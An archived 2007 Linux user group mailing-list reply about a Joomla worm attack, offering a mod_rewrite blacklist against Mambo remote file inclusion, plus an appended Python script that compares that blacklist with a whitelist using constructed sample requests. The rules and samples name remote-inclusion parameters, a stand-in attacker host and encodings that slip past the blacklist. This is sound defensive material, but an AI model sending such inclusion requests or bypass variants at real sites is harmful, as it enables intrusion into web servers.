[Klug-general] A friend got script kiddied...

MacGyveR macgyver at thedumbterminal.co.uk
Wed Nov 28 21:01:32 GMT 2007


On Wednesday 28 November 2007 17:56, Karl Lattimer wrote:
>
> It happened like this: firstly I started back-tracing the logs, most of
> what he did was automated, looks like a joomla worm of some sort. Here's
> the BUT! He made a posting to a forum of a series of domains he'd
> defaced, as people from the forum clicked back through it left us a click
> trail to follow, right back to his boasting post which we were unable to
> read, however the forum's policy was to display certain contact info
> even in private forums, so we nabbed it there.
>
> Pretty simple really.
>
> This is the third time we've had a joomla worm hit us, and it looks like
> the same exploit had been used on the server on 5 separate occasions by
> 5 different worms. Time was when you closed the security hole properly
> behind you so you could continue to use it and nobody noticed; that is
> the essence of ownage.
>
> K,
>
>
>
> _______________________________________________
> Kent mailing list
> Kent at mailman.lug.org.uk
> https://mailman.lug.org.uk/mailman/listinfo/kent

Sounds like a web app firewall is needed, so you can block these kinds of 
abnormal requests. Try mod_security, or even mod_rewrite as a poor man's 
solution (the example below is for Mambo, but you get the idea):

        #begin app_firewall.conf
        RewriteEngine on
        #stop TRACE and TRACK (cross-site tracing)
        RewriteCond %{REQUEST_METHOD} ^(TRACE|TRACK)
        RewriteRule .* - [F,E=APPFIREWALL:blocked]
        #block mambo hacks: requests that pass a remote URL in the
        #path-style parameters of vulnerable components (remote file inclusion)
        RewriteCond %{THE_REQUEST} /component.+\.php
        RewriteCond %{QUERY_STRING} mosConfig_absolute_path=http
        RewriteRule .* - [F,E=APPFIREWALL:blocked]
        RewriteCond %{QUERY_STRING} ff_compath=http
        RewriteRule .* - [F,E=APPFIREWALL:blocked]
        RewriteCond %{THE_REQUEST} /component.+\.php
        RewriteCond %{QUERY_STRING} sbp=http
        RewriteRule .* - [F,E=APPFIREWALL:blocked]
        RewriteCond %{THE_REQUEST} /index2\.php
        RewriteCond %{QUERY_STRING} mosConfig_absolute_path=http
        RewriteRule .* - [F,E=APPFIREWALL:blocked]
        #custom log format with vhost (the format string is cut off in the
        #list archive)
        CustomLog /usr/local/apache2/logs/appfirewall_log "[%v] %h %l %u %t \"%
        #end app_firewall.conf

<VirtualHost www.bla.com:80>
        Include conf/app_firewall.conf
</VirtualHost>

The above is basically a blacklist, but with mod_security you can implement a 
whitelist approach.

-- 
--------------------------------
http://www.thedumbterminal.co.uk
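As an added example, not part of the original post or thread, the following Python script transcribes the mod_rewrite blacklist above into plain regex checks and sets it beside a minimal positive model (whitelist) of the kind mod_security rules can express, then runs both over a few constructed requests. The transcription keeps the two properties the Apache rules have: RewriteCond patterns are case-sensitive unless given the [NC] flag, and %{QUERY_STRING} is the raw, still percent-encoded query string. The allowed paths, parameter names and value patterns in the whitelist, the 198.51.100.7 host and the sample requests are all assumptions made up for the demonstration, not taken from the page or from any real site.

```python
import re
from urllib.parse import parse_qsl

# Python transcription of the mod_rewrite blacklist in the post above.
# Each entry is (rule name, REQUEST_METHOD regex, THE_REQUEST regex,
# QUERY_STRING regex); None means no condition on that variable.
# Like mod_rewrite, the patterns are unanchored substring searches,
# case-sensitive (no [NC]), applied to the raw percent-encoded query.
BLACKLIST = [
    ("trace-track",       r"^(TRACE|TRACK)", None,                 None),
    ("component-abspath", None,              r"/component.+\.php", r"mosConfig_absolute_path=http"),
    ("ff_compath",        None,              None,                 r"ff_compath=http"),
    ("component-sbp",     None,              r"/component.+\.php", r"sbp=http"),
    ("index2-abspath",    None,              r"/index2\.php",      r"mosConfig_absolute_path=http"),
]


def blacklist_verdict(method, target):
    """Name of the first blacklist rule that fires, or None if the request passes."""
    the_request = f"{method} {target} HTTP/1.1"   # what %{THE_REQUEST} holds
    query_string = target.partition("?")[2]         # raw %{QUERY_STRING}
    for name, method_re, request_re, query_re in BLACKLIST:
        if method_re and not re.search(method_re, method):
            continue
        if request_re and not re.search(request_re, the_request):
            continue
        if query_re and not re.search(query_re, query_string):
            continue
        return name
    return None


# A positive model (whitelist) of the sort mod_security rules can express.
# Paths, parameter names and value patterns are assumptions for a generic
# Mambo/Joomla front end, not taken from the post or from any real site;
# a deployment would derive them from its own installation.
ALLOWED_METHODS = {"GET", "POST", "HEAD"}
ALLOWED_PATH = re.compile(r"^/(index\.php|index2\.php)?$")
PARAM_MODEL = {
    "option": re.compile(r"^com_[a-z0-9_]{1,32}$"),
    "task":   re.compile(r"^[a-z_]{1,32}$"),
    "id":     re.compile(r"^[0-9]{1,10}$"),
    "Itemid": re.compile(r"^[0-9]{1,10}$"),
}


def whitelist_verdict(method, target):
    """None if the request fits the positive model, otherwise the reason it was rejected."""
    if method not in ALLOWED_METHODS:
        return f"method {method} not allowed"
    path, _, query_string = target.partition("?")
    if not ALLOWED_PATH.match(path):
        return f"path {path} not in model"
    # parse_qsl percent-decodes, so the values are judged after decoding
    for key, value in parse_qsl(query_string, keep_blank_values=True):
        pattern = PARAM_MODEL.get(key)
        if pattern is None:
            return f"unknown parameter {key}"
        if not pattern.match(value):
            return f"bad value for {key}"
    return None


# Constructed sample requests (not real traffic); 198.51.100.7 is a
# documentation address standing in for the attacker's host.
SAMPLES = [
    ("GET",   "/index.php?option=com_content&task=view&id=42&Itemid=1"),
    ("GET",   "/index2.php?mosConfig_absolute_path=http://198.51.100.7/c.txt?"),
    ("GET",   "/index2.php?mosConfig_absolute_path=HTTP://198.51.100.7/c.txt?"),
    ("GET",   "/index2.php?mosConfig_absolute_path=%68ttp://198.51.100.7/c.txt?"),
    ("GET",   "/components/com_foo/foo.php?mosConfig_absolute_path=ftp://198.51.100.7/c.txt"),
    ("TRACE", "/"),
]


def audit(samples=SAMPLES):
    """Run both checks over the samples; returns [(method, target, blacklist, whitelist)]."""
    return [(m, t, blacklist_verdict(m, t), whitelist_verdict(m, t)) for m, t in samples]


if __name__ == "__main__":
    for method, target, black, white in audit():
        print(f"{method:5} {target}\n      blacklist: {black}\n      whitelist: {white}")
```

Run as-is, the script shows the point of the last two lines of the post: the blacklist catches the literal `mosConfig_absolute_path=http` and TRACE cases, but the same parameter spelt `HTTP://`, percent-encoded as `%68ttp://`, or using an `ftp://` URL sails through, because the rules only know the exact strings they were written for. The positive model rejects all of them without knowing anything about the attack, simply because `mosConfig_absolute_path` is not a parameter the front end is supposed to take and `/components/...` is not a path it serves directly.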
